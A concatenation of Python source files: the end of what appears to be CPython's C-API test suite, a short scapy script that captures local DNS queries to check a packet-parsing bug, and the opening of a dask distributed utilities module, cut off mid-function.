'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then call
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
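# Each output line is 'MemoryError <outer_cnt> <j>'; the assertions below check that the failing allocation index j stays close to 5*i for each outer iteration i (with a slack of 2).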
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-2)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need on the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, B.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decrefs the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decrefs the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
        # (directly by the binary, or via the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
        # now, stick around until len(l) has grown to n
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
@threading_helper.requires_working_threading()
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
class Test_FrameAPI(unittest.TestCase):
def getframe(self):
return sys._getframe()
def getgenframe(self):
yield sys._getframe()
def test_frame_getters(self):
frame = self.getframe()
self.assertEqual(frame.f_locals, _testcapi.frame_getlocals(frame))
self.assertIs(frame.f_globals, _testcapi.frame_getglobals(frame))
self.assertIs(frame.f_builtins, _testcapi.frame_getbuiltins(frame))
self.assertEqual(frame.f_lasti, _testcapi.frame_getlasti(frame))
def test_frame_get_generator(self):
gen = self.getgenframe()
frame = next(gen)
self.assertIs(gen, _testcapi.frame_getgenerator(frame))
SUFFICIENT_TO_DEOPT_AND_SPECIALIZE = 100
class Test_Pep523API(unittest.TestCase):
def do_test(self, func):
calls = []
start = SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
count = start + SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
for i in range(count):
if i == start:
_testinternalcapi.set_eval_frame_record(calls)
func()
_testinternalcapi.set_eval_frame_default()
self.assertEqual(len(calls), SUFFICIENT_TO_DEOPT_AND_SPECIALIZE)
for name in calls:
self.assertEqual(name, func.__name__)
def test_pep523_with_specialization_simple(self):
def func1():
pass
self.do_test(func1)
def test_pep523_with_specialization_with_default(self):
def func2(x=None):
pass
self.do_test(func2)
if __name__ == "__main__":
unittest.main()
|
dns_test.py
|
#!/usr/bin/env python
# ------------------------------------------------------------
# dns_test.py
# Exercise DNS requests using IPv4 and IPv6 transport
# and evaluate the captured responses and the remediation of the Scapy
# DNS packet bug.
# ------------------------------------------------------------
# references
# http://stackoverflow.com/questions/26433826/no-dns-layer-using-scapy-from-python-2-6
# https://bitbucket.org/secdev/scapy/issues/913/dns-responses-are-malformed-after
# https://bitbucket.org/secdev/scapy/pull-requests/18/implemented-phils-idea-to-solve-issue-913/diff
# https://en.wikipedia.org/wiki/IPv6_address
# ------------------------------------------------------------
from multiprocessing import Process
from scapy.all import sniff
from scapy.layers.inet import UDP, IP
from scapy.layers.dns import DNS
from scapy.utils import rdpcap, wrpcap
import time
import sys
import subprocess
def msg(txt):
sys.stderr.write(txt + "\n")
sys.stderr.flush()
def dig(four6):
msg("dig sleeping")
time.sleep(2)
if four6 == "4":
subprocess.call("dig -4 +time=1 +tries=1 @192.168.2.1 cnn.com".split(" "))
else:
subprocess.call("dig -6 +time=1 +tries=1 @192.168.2.1 cnn.com".split(" "))
time.sleep(2)
msg("dig done")
def parent(ip_version):
msg("============================================================")
msg("starting dig process USING IPv{}".format(ip_version))
p = Process(target=dig, args=(ip_version, ))
p.start()
msg("starting sniff")
pkts = sniff("eth0", lfilter=lambda x: (UDP in x and DNS in x), timeout=6)
msg("sniff done, joining dig")
p.join()
msg("\noriginal\n----------------------------------------")
pkts.nsummary()
msg("\nsave and reload 1\n----------------------------------------")
pktfile = "pkts2.pcap"
wrpcap(pktfile, pkts)
pkts2 = rdpcap(pktfile)
pkts2.nsummary()
msg("\nsave and reload 2\n----------------------------------------")
for p in pkts:
if IP in p:
del(p[IP].len)
if UDP in p:
del(p[UDP].len)
del(p[UDP].chksum)
pktfile = "pkts3.pcap"
wrpcap(pktfile, pkts)
pkts3 = rdpcap(pktfile)
pkts3.nsummary()
msg("----------------------------------------\n")
if __name__ == "__main__":
    # pass the version as a string so dig() selects the matching transport
    parent("4")
    parent("6")
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import Iterable, deque
from contextlib import contextmanager
from datetime import timedelta
import functools
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
from toolz import memoize, valmap
import tornado
from tornado import gen
from tornado.ioloop import IOLoop, PollIOLoop
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
